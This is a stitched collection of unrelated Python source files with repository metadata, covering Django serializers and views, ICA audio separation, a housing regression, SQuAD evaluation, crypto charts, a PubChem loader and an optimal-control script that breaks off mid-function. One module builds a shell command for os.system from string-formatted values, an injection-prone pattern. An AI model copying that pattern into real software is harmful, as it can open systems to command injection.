from infrastructure.database.base_classes.mongodb import OrmEntityBase
Entity = TypeVar('Entity', bound=BaseEntityProps)
OrmEntity = TypeVar('OrmEntity')
Props = TypeVar('Props')
class OrmMapperBase(ABC, Generic[Entity, OrmEntity]):
def __init__(self) -> None:
super().__init__()
@property
@abstractmethod
def entity_klass(self):
# return get_args(self.__orig_bases__[0])[0]
raise NotImplementedError()
@property
@abstractmethod
def orm_entity_klass(self):
# return get_args(self.__orig_bases__[0])[1]
raise NotImplementedError()
@abstractmethod
def to_domain_props(self, orm_entity: OrmEntity) -> Any:
return
@abstractmethod
def to_orm_props(self, entity: Entity) -> OrmEntity:
return
def to_domain_entity(self, orm_entity: OrmEntity) -> Entity:
props = self.to_domain_props(orm_entity)
return self.assign_props_to_entity(props, orm_entity)
def to_orm_entity(self, entity: Entity) -> OrmEntity:
props = self.to_orm_props(entity)
return self.orm_entity_klass(**{
**props,
'id': entity.id.value,
'created_at': entity.created_at.value,
'updated_at': entity.updated_at.value
})
def assign_props_to_entity(
self,
entity_props: Any,
orm_entity: OrmEntity
) -> Entity:
return self.entity_klass.from_orm({
**entity_props,
"id": ID(str(orm_entity.id)),
"created_at": DateVO(orm_entity.created_at),
"updated_at": DateVO(orm_entity.updated_at)
})
| KCDichDaNgu/KC4.0_DichDaNgu_BackEnd | src/infrastructure/database/base_classes/mongodb/orm_mapper_base.py | orm_mapper_base.py | py | 1,853 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TypeVar",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "core.base_classes.entity.BaseEntityProps",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "typing.TypeVar",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "t... |
35243312943 | from rest_framework import serializers
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import Group, Facultie, Student, HistoryOfRating
class FacultiesSerializers(serializers.ModelSerializer):
class Meta:
model = Facultie
fields = ('id', 'name', 'dean', 'phone_number')
class GroupsSerializers(serializers.ModelSerializer):
faculty_name = serializers.SerializerMethodField('get_faculty_name')
class Meta:
model = Group
fields = ('id', 'name', 'faculty_name', 'year')
def get_faculty_name(self, Group):
faculty_name = Group.faculty.name
return faculty_name
class StudentsSerializers(serializers.ModelSerializer):
class Meta:
model = Student
fields = ('id', 'name', 'email', 'rating', 'description', 'group')
class StudentProfileSerializers(serializers.ModelSerializer):
group_name = serializers.SerializerMethodField('get_group_name')
class Meta:
model = Student
fields = ('id', 'name', 'email', 'rating', 'description', 'group_name')
def get_group_name(self, Student):
group_name = Student.group.name
return group_name
# class HistoryOfRatingSerializers(serializers.ModelSerializer):
# class Meta:
# model = HistoryOfRating
# fields = ('date_of_change', 'reason', 'rating_value', 'id_student')
class HistoryOfRatingSerializers(serializers.ModelSerializer):
class Meta:
model = HistoryOfRating
fields = ('date_of_change', 'reason', 'rating_value', 'id_student')
def update(self, instance, validated_data):
instance.rating_value = validated_data.get('rating_value', instance.rating_value)
return instance
class ReasonsSerializer(APIView):
REASONS = {'reasons': [{'reason': 'Пользование мобильным устройством во время пары', 'rating': '-20'},
{'reason': 'Опоздание более чем на 0 милисекунд', 'rating': '-50'},
{'reason': 'Недостаточная вежливость по отношению к преподавателю и студентам',
'rating': '-10'},
{'reason': 'Невнимательное поведение на лекции', 'rating': '-20'},
{'reason': 'Некрасивый почерк у доски', 'rating': '-10'},
{'reason': 'Недостаточная активность на семинаре или практике', 'rating': '-30'},
{'reason': 'Плохое настроение', 'rating': '-5'},
{'reason': 'Оскорбление администрации', 'rating': '-100'},
{'reason': 'Немытая голова', 'rating': '-10'},
{'reason': 'Задержка в сдаче дз', 'rating': '-50'},
{'reason': 'Хорошие взаимоотношения с администратором', 'rating': '+100'},
{'reason': 'Своевременное выполнение дз', 'rating': '+10'},
{'reason': 'Активное поведение на семинаре', 'rating': '+20'},
{'reason': 'Подарок преподавателю', 'rating': '+50'},
{'reason': 'Участие в мероприятии', 'rating': '+30'},
{'reason': 'Ответ у доски', 'rating': '+5'},
{'reason': 'Отсутствие пропусков за месяц', 'rating': '+10'},
{'reason': 'Участие в олимпиаде', 'rating': '+20'},
{'reason': 'Отсутствие долгов на протяжении года', 'rating': '+50'},
{'reason': 'Отсутствие опозданий за неделю', 'rating': '+5'}]}
def get(self, request):
return Response(self.REASONS)
| Ruslan1kHasanov/social_project | main/serializers.py | serializers.py | py | 4,354 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.serializers.ModelSerializer",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "models.Facultie",
"line_number": 11,
"usage_type": "name"
},
... |
38177166821 | import logging
import os
from django.conf import settings
from django.db.models import Q
from django.http import HttpResponse
from django.utils.safestring import mark_safe
from cvAppMain.helpers import get_cv_url
from cvAppMain.models import GeneratedPDF
logger = logging.getLogger('django')
def make_context(process, language):
"""Makes a context for CV generating"""
context = {"process": process}
for each in process.texts.filter(
Q(language=language) |
Q(language__isnull=True)):
context[each.text_type.codename] = mark_safe(each.text)
return context
def get_pdf(process, language):
"""Gets a cached PDF from DB or calls generating a new one"""
saved_file = process.generatedpdf_set.filter(language=language).first()
if saved_file:
return saved_file.as_response()
else:
return render_to_pdf(process, language)
def render_to_pdf(process, language):
"""Uses WKHTMLTOPDF to generate a PDF from URL.
This function requires PROTOCOL and HOST settings to be set."""
temp_pdf = f'pdfs/{process.codename}_{language.lang}.pdf'
wkhtmltopdf_command = f'wkhtmltopdf "{settings.PROTOCOL}{settings.HOST}{get_cv_url(process.codename, language, "html")}" {temp_pdf}'
try:
logger.info(f"Rendering PDF to:\n{temp_pdf}\nwith command:\n{wkhtmltopdf_command}\n")
os.system(wkhtmltopdf_command)
except Exception as e:
logger.error("Error while generating PDF: " + str(e))
try:
saved_pdf = GeneratedPDF.objects.create(process=process, language=language, pdf=temp_pdf)
return saved_pdf.as_response()
except Exception as e:
logger.error("Error while saving and returning PDF: " + str(e))
return HttpResponse('Something went wrong while generating PDF! Sorry!')
| EricFelixLuther/cvApp | cv_App/cvAppMain/pdf_logic.py | pdf_logic.py | py | 1,819 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.db.models.Q",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.db.models.Q",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.utils.... |
4254437724 | from sklearn.decomposition import FastICA
import numpy
import matplotlib.pyplot as plt
import time
from scipy.io import wavfile
from Processor import Processor
from sklearn import preprocessing
class ICA:
def __init__(self, mixed_sig, no_of_components):
self.mixed_signal = mixed_sig
self.num_components = no_of_components
def train(self, opt, proc):
print("Training ICA...")
time_start = time.time()
# whitening necessary
if opt == 2:
ica = FastICA(n_components=self.num_components, whiten=False)
elif opt == 3:
ica = FastICA(n_components=self.num_components, fun='exp')
elif opt == 4:
ica = FastICA(n_components=self.num_components, fun='cube')
elif opt == 5:
self.mixed_signal = preprocessing.scale(self.mixed_signal)
ica = FastICA(n_components=self.num_components)
else:
ica = FastICA(n_components=self.num_components)
# self.mixed_signal = preprocessing.scale(self.mixed_signal)
reconstruct_signal = ica.fit_transform(self.mixed_signal)
mixing_matrix = ica.mixing_
time_stop = time.time() - time_start
print("Training Complete under {} seconds".format(time_stop))
if opt == 2:
assert numpy.allclose(self.mixed_signal, numpy.dot(reconstruct_signal, mixing_matrix.T))
else:
assert numpy.allclose(self.mixed_signal, numpy.dot(reconstruct_signal, mixing_matrix.T) + ica.mean_)
if opt == 2:
remixed_mat = numpy.dot(reconstruct_signal, mixing_matrix.T)
else:
remixed_mat = numpy.dot(reconstruct_signal, mixing_matrix.T) + ica.mean_
for q in range(len(remixed_mat.T)):
y = remixed_mat.T[q] - self.mixed_signal.T[q]
q = sum([i**2 for i in y])
print("Residual value: {}".format(q))
# for i in range(len(remixed_mat.T)):
# wavfile.write('aaa.wav', proc[0], numpy.asarray(remixed_mat.T[0], dtype=numpy.int16))
return reconstruct_signal, mixing_matrix, remixed_mat
def create_audio(self, reconstructed_mat, s_hat_names, remixed_mat, recon_names, rates):
print("Creating recovered audio...")
for count in range(len(s_hat)):
wavfile.write(s_hat[count], rates[count], reconstructed_mat.T[count])
wavfile.write(recon_names[count], rates[count], numpy.asarray(remixed_mat.T[count], dtype=numpy.int16))
def plot_audio(self, mixed_sig, recovered_sig):
print("Plotting graphs...")
models = [mixed_sig, recovered_sig]
names = ['Observations (mixed signal)',
'ICA recovered signals']
colors = ['red', 'steelblue', 'orange', 'green', 'brown']
plt.figure()
for ii, (model, name) in enumerate(zip(models, names), 1):
plt.subplot(2, 1, ii)
plt.title(name)
for sig, color in zip(model.T, colors):
plt.plot(sig, color=color)
plt.subplots_adjust(0.09, 0.04, 0.94, 0.94, 0.26, 0.46)
plt.show()
if __name__ == '__main__':
audios = ['mic1.wav', 'mic2.wav', 'mic3.wav', 'mic4.wav', 'mic5.wav']
s_hat = ['shat1.wav', 'shat2.wav', 'shat3.wav', 'shat4.wav', 'shat5.wav']
recon = ['recon1.wav', 'recon2.wav', 'recon3.wav', 'recon4.wav', 'recon5.wav']
processor = Processor(audios)
processor.generate_wav_data()
# Options: 1: default, 2: whitening off, 3: exp function, 4: cube function, 5: centering
option = 1
ica_ = ICA(processor.mixed_signal, 5)
recon_matrix, mixing_matrix, remixed = ica_.train(option, processor.rates)
ica_.create_audio(recon_matrix, s_hat, remixed, recon, processor.rates)
ica_.plot_audio(processor.mixed_signal, recon_matrix)
| sarmientoj24/ICA | ICA.py | ICA.py | py | 3,910 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sklearn.decomposition.FastICA",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sklearn.decomposition.FastICA",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": ... |
40837765126 | import os
import tarfile
from six.moves import urllib
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error
# sns.set()
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml2/master/"
HOUSING_PATH = os.path.join("data", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
if not os.path.isdir(housing_path):
os.makedirs(housing_path)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
def get_data_info():
print(housing.info())
data_describe = housing.describe()
return data_describe
fetch_housing_data()
housing = load_housing_data()
data_describe = get_data_info()
housing = pd.get_dummies(housing)
plt.figure(1)
sns.histplot(data=housing)
plt.figure(2)
sns.scatterplot(data=housing, x='longitude', y='latitude', hue='median_house_value', s=1)
corr_matrix = housing.corr()
housing["rooms_per_household"] = housing["total_rooms"]/housing["households"]
housing["bedrooms_per_room"] = housing["total_bedrooms"]/housing["total_rooms"]
housing["population_per_household"]=housing["population"]/housing["households"]
target = housing.pop('median_house_value')
housing['median_house_value'] = target
housing = housing.dropna()
corr_matrix_2 = housing.corr()
X = housing.loc[:, 'longitude':'population_per_household']
y = housing['median_house_value']
X_train, X_test, y_train, y_test = train_test_split(X, y)
def evaluate_model(estimator):
model = make_pipeline(StandardScaler(), estimator)
model.fit(X_train, y_train)
y_predicted = model.predict(X_train)
print('\nAccuracy on train set:', model.score(X_train, y_train))
mse = np.sqrt(mean_squared_error(y_train, y_predicted))
print('Mean squared error:', mse)
print('Accuracy on test set:', model.score(X_test, y_test))
estimators = [LinearRegression(), RandomForestRegressor()]
for i in estimators:
evaluate_model(i)
plt.show()
| lewiis252/pythonProject4 | cal_hous.py | cal_hous.py | py | 2,609 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.isdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
25587181346 | import torch
from tqdm import tqdm, trange
from utils_squad_evaluate import EVAL_OPTS, main as evaluate_on_squad, plot_pr_curve
from utils_squad import (read_squad_examples, convert_examples_to_features,
RawResult, write_predictions,
RawResultExtended, write_predictions_extended)
def to_list(tensor):
return tensor.detach().cpu().tolist()
def evaluate(model, validation_dataloader, features_val, examples_val, tokenizer, predict_file, len_val, batch_size, device):
print("***** Running evaluation *****")
print(" Num examples = %d" % len_val)
print(" Batch size = %d" % batch_size)
all_results = []
for batch in tqdm(validation_dataloader, desc="Evaluating", miniters=100, mininterval=5.0):
model.eval()
batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'token_type_ids': batch[2]
}
example_indices = batch[3]
outputs = model(**inputs)
for i, example_index in enumerate(example_indices):
eval_feature = features_val[example_index.item()]
unique_id = int(eval_feature.unique_id)
result = RawResult(unique_id = unique_id,
start_logits = to_list(outputs[0][i]),
end_logits = to_list(outputs[1][i]))
all_results.append(result)
# Compute predictions
output_prediction_file = "/predictions/predictions.json"
output_nbest_file = "/predictions/nbest_predictions.json"
output_null_log_odds_file = "/predictions/null_odds.json"
output_dir = "/predictions/predict_results"
write_predictions(examples_val, features_val, all_results, 10,
30, True, output_prediction_file,
output_nbest_file, output_null_log_odds_file, False,
True, 0.0)
# Evaluate with the official SQuAD script
evaluate_options = EVAL_OPTS(data_file=predict_file,
pred_file=output_prediction_file,
na_prob_file=output_null_log_odds_file,
out_image_dir=None)
results = evaluate_on_squad(evaluate_options)
return results | markjluo/DL-Project-A-Deep-Learning-Based-Chatbot | evaluate.py | evaluate.py | py | 2,255 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "tqdm.tqdm",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "utils_squad.RawResult",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "utils_squad.write_predi... |
25282953204 | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
def main():
#--- 取得URLの決定
url = 'https://github.com/librariapj'
#--- requestsでdom取得
response = requests.get(url)
#--- 取得結果の表示
print(response)
# print(response.text)
#--- BS4に取得内容を格納
soup = BeautifulSoup(response.content, 'html.parser')
#--- BS4の出力
# 全文
#print(soup.prettify())
# aタグ
print(soup.find_all("a"))
if __name__ == "__main__":
main()
| librariapj/SampleProject | src/hello.py | hello.py | py | 535 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 14,
"usage_type": "call"
}
] |
13861490174 | from django.core.paginator import Paginator
import plotly.graph_objects as go
from django.shortcuts import render
from django.contrib import messages
import matplotlib.dates as mdates
from .api_calls import (
fetch_coins,
fetch_market_charts,
fetch_coin_details,
fetch_order_book,
fetch_coin_history,
API_COINCAP_URL,
API_BASE_URL,
API_BASE_URL_CHARTS,
API_BASE_URL_DETAILS,
API_ORDER_BOOK_URL,
params,
chart_params,
order_params
)
import matplotlib
matplotlib.use('Agg')
from dateutil.parser import parse as parse_date
import matplotlib.pyplot as plt
from io import BytesIO
import base64
from datetime import datetime
import re
import datetime
def crypto(request):
# Fetch data
coin_data = fetch_coins(API_BASE_URL, params)
# Check if data was successfully fetch
if coin_data is None:
messages.error(request, 'The limit for fetch requests has been reached. Please try again later.')
return render(request, 'crypto_pulse/crypto.html')
if 'error' in coin_data and coin_data['error']['code'] == 429:
messages.error(request, 'The limit for fetch requests has been reached. Please try again later.')
return render(request, 'crypto_pulse/crypto.html')
# Split data into 10 coins per page
paginator = Paginator(coin_data, 10)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
# Store coin data in the session
request.session['coin_data'] = coin_data
# List to store coin data as dictionaries
coins = []
for coin in page_obj:
coin_info = {
'name': coin.get('name'),
'symbol': coin.get('symbol'),
'image': coin.get('image'),
'market_cap': coin.get('market_cap'),
'daily_price_change': coin.get('price_change_percentage_24h'),
'daily_volume': coin.get('total_volume'),
'current_price': coin.get('current_price'),
}
coins.append(coin_info)
return render(request, 'crypto_pulse/crypto.html', {'page_obj': page_obj, 'coins': coins})
def coin_chart(request, coin_symbol):
# Format symbol
coin_symbol = coin_symbol.upper() + 'USDT'
if coin_symbol == 'USDTUSDT':
coin_symbol = 'BUSDUSDT'
title_coin_symbol = coin_symbol.replace('USDT', '/USDT')
# Fetch data
candles_data = fetch_market_charts(API_BASE_URL_CHARTS, coin_symbol=coin_symbol, params=chart_params)
orderbook_data = fetch_order_book(API_ORDER_BOOK_URL, coin_symbol=coin_symbol, params=order_params)
# Check if data was successfully fetched
if candles_data is None and orderbook_data is None:
messages.error(request, 'Failed to fetch candlestick data. Please try again.')
return render(request, 'crypto_pulse/coin_chart.html')
# Parse the orderbook data from Binance API
bids_data = orderbook_data['bids']
asks_data = orderbook_data['asks']
# Parse the data from the Binance API to create the candlestick chart
timestamps = [candle[0] for candle in candles_data]
open_prices = [float(candle[1]) for candle in candles_data]
high_prices = [float(candle[2]) for candle in candles_data]
low_prices = [float(candle[3]) for candle in candles_data]
close_prices = [float(candle[4]) for candle in candles_data]
# Calculate the date range for the last 3 months
today = datetime.date.today()
three_months_ago = today - datetime.timedelta(days=90)
# Filter the data to show only the last 3 months
filtered_data = [(timestamp, open_price, high_price, low_price, close_price)
for timestamp, open_price, high_price, low_price, close_price in zip(timestamps, open_prices, high_prices, low_prices, close_prices)
if datetime.datetime.fromtimestamp(timestamp / 1000).date() >= three_months_ago]
# Create the candlestick chart
fig = go.Figure(data=[go.Candlestick(x=[candle[0] for candle in filtered_data],
open=[candle[1] for candle in filtered_data],
high=[candle[2] for candle in filtered_data],
low=[candle[3] for candle in filtered_data],
close=[candle[4] for candle in filtered_data])])
# Customize the chart layout
fig.update_layout(
xaxis=dict(
type='date', # Set the x-axis type to 'date'
range=[three_months_ago, today + datetime.timedelta(days=1)], # Set the x-axis range to include an extra day
gridcolor='rgba(255, 255, 255, 0.2)', # Set the grid color with transparency
showgrid=True, # Show the grid lines
),
yaxis=dict(
gridcolor='rgba(255, 255, 255, 0.2)', # Set the grid color with transparency for the y-axis
showgrid=True, # Show the grid lines for the y-axis
),
plot_bgcolor='rgba(0, 0, 0, 0)', # Set the plot area background to transparent
paper_bgcolor='rgba(0, 0, 0, 0)', # Set the entire chart background to transparent
font=dict(color='white'), # Set the font color for the labels and legend to white
title=dict(text=f'{title_coin_symbol}', # Set the title of the chart
x=0.5, # Set the title position to the center of the chart
y=0.95, # Set the title position relative to the y-axis
font=dict(size=24) # Set the font size of the title
),
xaxis_rangeslider_visible=False
)
# Convert the chart to JSON to pass it to the template
chart_json = fig.to_json()
# Get coin data from the session
coin_data = request.session.get('coin_data', [])
coin_info = {}
for coin in coin_data:
real_coin_symbol = coin_symbol.replace('USDT', '').lower()
if coin['symbol'] == real_coin_symbol:
coin_info = {
'name': coin.get('name'),
'symbol': real_coin_symbol,
'current_price': coin.get('current_price'),
'daily_price_change': coin.get('price_change_percentage_24h'),
'daily_volume': coin.get('total_volume'),
'market_cap': coin.get('market_cap'),
}
break
# Pass the selected coin's data and chart JSON to the template
return render(request, 'crypto_pulse/coin_chart.html', {'chart_json': chart_json,
'coin_info': coin_info,
'bids': bids_data,
'asks': asks_data})
def coin_details(request, coin_name):
# Fetch data for description
if coin_name.lower() == 'xrp':
coin_name = 'ripple'
if coin_name.lower() == 'binance usd':
coin_name = 'binance-usd'
if coin_name.lower() == 'bnb':
coin_name = 'busd'
if coin_name.lower() == 'usd coin' or coin_name.lower() == 'usd%20coin':
coin_name = 'usd-coin'
if coin_name.lower() == 'wrapped bitcoin' or coin_name.lower() == 'wrapped%20bitcoin':
coin_name = 'wrapped-bitcoin'
if coin_name.lower() == 'shiba inu' or coin_name.lower() == 'shiba%20inu':
coin_name = 'shiba-inu'
if coin_name.lower() == 'bitcoin cash' or coin_name.lower() == 'bitcoin%20cash':
coin_name = 'bitcoin-cash'
if coin_name.lower() == 'ethereum classic' or coin_name.lower() == 'ethereum%20classic':
coin_name = 'ethereum-classic'
if coin_name.lower() == 'cosmos hub' or coin_name.lower() == 'cosmos%20hub':
coin_name = 'cosmos-hub'
coin_details = fetch_coin_details(API_BASE_URL_DETAILS, coin_name=coin_name)
if coin_name.lower() == 'ripple':
coin_name = 'xrp'
coin_history = fetch_coin_history(API_COINCAP_URL, coin_name=coin_name)
if coin_history is None:
messages.error(request, 'Failed to fetch data. Please try again.')
return render(request, 'crypto_pulse/coin_chart.html')
data = coin_history['data']
# Parse coin history
data = coin_history['data']
prices = []
dates = []
for data_point in data:
price = data_point['priceUsd']
date = data_point['date']
prices.append(float(price))
dates.append(date)
# Convert formatted_dates to datetime objects
formatted_dates = [parse_date(date_string) for date_string in dates]
# Clear plots
plt.clf()
plt.figure(figsize=(11, 4)) # Adjust the height to 4
# Creating line chart
plt.plot(formatted_dates, prices, linewidth=2)
# Plot info and style
plt.style.use('_mpl-gallery')
plt.xlabel('', color='white') # Increase font size to 12
plt.ylabel('', color='white') # Increase font size to 12
plt.title(f'{coin_name} price', color='white') # Increase font size to 16
plt.tight_layout()
# Remove the grid from both axes
plt.grid(False)
# Style tick labels on both axes to have a white font color and increase font size to 10
plt.tick_params(axis='x', colors='white')
plt.tick_params(axis='y', colors='white', labelsize=8)
# Configure x-axis tick marks to display fewer dates
locator = mdates.AutoDateLocator(minticks=5, maxticks=9)
formatter = mdates.ConciseDateFormatter(locator)
plt.gca().xaxis.set_major_locator(locator)
plt.gca().xaxis.set_major_formatter(formatter)
# Convert the plot to an image
buffer = BytesIO()
plt.savefig(buffer, format='png', transparent=True)
buffer.seek(0)
line_chart = base64.b64encode(buffer.getvalue()).decode('utf-8')
buffer.close()
# Check if data was successfully fetched
if coin_details is None:
messages.error(request, 'Failed to fetch data. Please try again.')
return render(request, 'crypto_pulse/coin_chart.html')
# Create a dictionary to store descriptions
description = coin_details['description']['en']
name = coin_details['name']
symbol = coin_details['symbol'].upper()
# Clean the description by removing URLs and links
cleaned_description = description.replace('<a href="', '')
url_pattern = re.compile(r'http[s]?://\S+|www\.\S+')
cleaned_description = re.sub(url_pattern, '', cleaned_description)
context = {
'description': cleaned_description,
'name': name,
'symbol': symbol,
'line_chart': line_chart
}
return render(request, 'crypto_pulse/coin_details.html', context) | LazyCiao/Performance-Pulse | crypto_pulse/views.py | views.py | py | 10,994 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "api_calls.fetch_coins",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "api_calls.API_BASE_URL",
"line_number": 34,
"usage_type": "argument"
},
{
"api_name": "api_c... |
28671672532 | import pandas as pd
import numpy
import os
import sys
import csv
import logging
import psycopg2
from psycopg2.extensions import register_adapter, AsIs
from cloudharness import applications
def addapt_numpy_int64(numpy_int64):
return AsIs(numpy_int64)
register_adapter(numpy.int64, addapt_numpy_int64)
app = applications.get_configuration("pub-chem-index")
conn_string = f"postgres://{app.db_name}:{app.harness.database.postgres.ports[0]['port']}/asu?user={app.harness.database.user}&password={app.harness.database.get('pass')}"
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
NUM_PROCESSES = 2
NUM_QUEUE_ITEMS = 20
#
# WARNING!!! use head command on files for debugging
# head -n 500000 CID-SMILES > CID-SMILES-head
#
# "https://ftp.ncbi.nlm.nih.gov/pubchem/Compound/Extras/CID-Synonym-unfiltered.gz"
added_col_dic = {
"CID-InChI-Key": ["CID", "InChI", "Key"],
"CID-Mass": ["CID", "Molecule", "Mass1", "Mass2"],
"CID-PMID": ["CID", "PMID"],
"CID-Parent": ["CID", "Parent"],
"CID-Patent": ["CID", "Patent"],
"CID-SID": ["CID", "SID"],
"CID-MeSH": ["CID", "MeSH"],
"CID-SMILES": ["CID", "SMILES"],
"CID-Synonym-filtered": ["CID", "Synonym"],
"CID-Synonym-unfiltered": ["CID", "Synonym"],
"CID-Title": ["CID", "Title"],
"CID-IUPAC": ["CID", "IUPAC"],
"CID-Component": ["CID", "component"],
}
gin_indexes_tables = ['CID-Title', 'CID-MeSH', 'CID-IUPAC', 'CID-InChI-Key', 'CID-Synonym-filtered']
def change_permissions_recursive(path, mode):
for root, dirs, files in os.walk(path, topdown=False):
for file in [os.path.join(root, f) for f in files]:
if file.startswith("export-"):
os.chmod(file, mode)
# os.chmod(path, mode)
def execute_sql(conn, command):
with conn.cursor() as cur:
logging.info(f"Execute {command}")
cur.execute(command)
conn.commit()
def create_table(conn, table_name):
# Populate GIN indexed table, this will take about 30 minutes.
column_names = added_col_dic[table_name]
column_names = [x.upper() for x in column_names]
table_name = table_name.replace("-", "_").upper()
str_column_names = ""
for i in column_names:
if i == "CID":
str_column_names += i + " INTEGER NOT NULL,"
else:
str_column_names += i + " VARCHAR,"
str_column_names = str_column_names[: len(str_column_names) - 1]
sql_drop_table = f"DROP TABLE IF EXISTS {table_name}"
sql_create_table = f"CREATE TABLE {table_name} ({str_column_names})"
execute_sql(conn, sql_drop_table)
execute_sql(conn, sql_create_table)
logging.info("Table created %s ", table_name)
def bulk_insert(conn, data, file_name):
with conn.cursor() as cur:
table_name = file_name.replace("-", "_").upper()
columns = added_col_dic[file_name]
column_list = ", ".join(columns)
records_list_template = ",".join(["%s"] * len(data))
insert_query = "insert into {table_name} ({columns}) values {};".format(
records_list_template, table_name=table_name, columns=column_list
)
cur.execute(insert_query, data)
conn.commit()
def create_indexes(conn, table_name, create_gin):
column_names = added_col_dic[table_name]
column_names = [x.upper() for x in column_names]
main_column = column_names[1].lower()
table_name = table_name.replace("-", "_").lower()
if create_gin:
logging.info("Start creating indexes")
execute_sql(conn, "CREATE EXTENSION IF NOT EXISTS pg_trgm;")
execute_sql(conn, f"CREATE INDEX IF NOT EXISTS idx_gin_{table_name} ON {table_name} USING gin ({main_column} gin_trgm_ops);")
execute_sql(conn, f"CREATE INDEX IF NOT EXISTS cid_idx_{table_name} ON {table_name} (CID);")
logging.info("Finish creating indexes")
def get_line(file_name):
with open(file_name) as file:
for i in file:
yield i
def go():
logging.info(f"Connecting with string: {conn_string}")
conn = psycopg2.connect(conn_string)
file = sys.argv[1]
file_name = os.path.basename(file)
logging.info(f"Populating table using file {file_name}")
column_name = ["CID", file_name]
types = {file_name: "string", "CID": "Int64"}
column_names = added_col_dic[file_name]
# column_names = [x.upper() for x in column_names]
main_column = column_names[1] # .upper()
gin_indexed = file_name in gin_indexes_tables
if file_name in added_col_dic:
column_name = added_col_dic[file_name]
types = {"CID": "string"}
for c in column_name:
if c != "CID":
types[c] = "string"
create_table(conn, file_name)
encoding = "UTF-8"
if file_name == "CID-Title":
encoding = "Latin"
chunksize = 200000
column_slice_size = len(column_names)
logging.info("Inserting...")
record_counter = 0
with open(file, "rb") as f:
data = []
for line in f:
data.append(tuple(line.decode(encoding).replace("\n","").split("\t")[:column_slice_size]))
if len(data) == chunksize:
with conn:
bulk_insert(conn, data, file_name)
record_counter += chunksize
if record_counter%10000 == 0:
logging.info(f"Total number of records inserted: {record_counter}")
data = []
# insert the left over data (if there is any)
if len(data) != chunksize:
with conn:
bulk_insert(conn, data, file_name)
record_counter += len(data)
logging.info(f"Total number of records inserted: {record_counter}")
logging.info("Inserting done...")
create_indexes(conn, file_name, gin_indexed)
go()
| MetaCell/asu-olfactory | applications/pub-chem-index/tasks/ingestion/populate_parallel.py | populate_parallel.py | py | 5,809 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "psycopg2.extensions.AsIs",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "psycopg2.extensions.register_adapter",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.int64",
"line_number": 17,
"usage_type": "attribute"
},
{
"ap... |
19453685544 | # -*- coding: utf-8 -*-
"""
Jianyu Chen
This is a project for optimal control.
Python code for 1-dim double well system
"""
#%%
import torch
from torch import nn
from torch.nn import functional as F
import math
import numpy as np
import matplotlib.pyplot as plt
#%%
t = np.arange(100) * 0.01
print(t)
sigma = 1
#%%
u= np.random.normal(0, 0.008, 100)
#u = np.linspace(0, 1, 100)
print(u)
sigma = 1
def runge_kutta(x, t, dt, f, u, i):
""" x is the initial value for x
t is the initial value for t
dt is the time step in t
f is derivative of function x(t)
"""
k1 = dt * (f(x, t)+u[i])
k2 = dt * (f(x + k1, t + dt)+u[i+1])
return x + (k1 + k2) / 2.
def get_x(u):
t = 0.
x = -1.
T = 1.0
dt = 0.01
xs, ts = [x], [0.0]
def func(x, t):
return x-x**3
i = 0
while i < 99:
#print (i, t)
x = runge_kutta(x, t, dt, func, u, i)
i += 1
t += dt
xs.append(x)
ts.append(t)
return np.array([np.float32(xx) for xx in xs])
#%%
import math
import numpy as np
import matplotlib.pyplot as plt
def runge_kutta(p, t, dt, f, xs, i):
""" p is the terminal value for p
t is the initial value for t
dt is the time step in t
f is derivative of function p(t)
"""
k1 = -dt * (f(p,t)*(3*xs[i]**2-1)-3*xs[i])
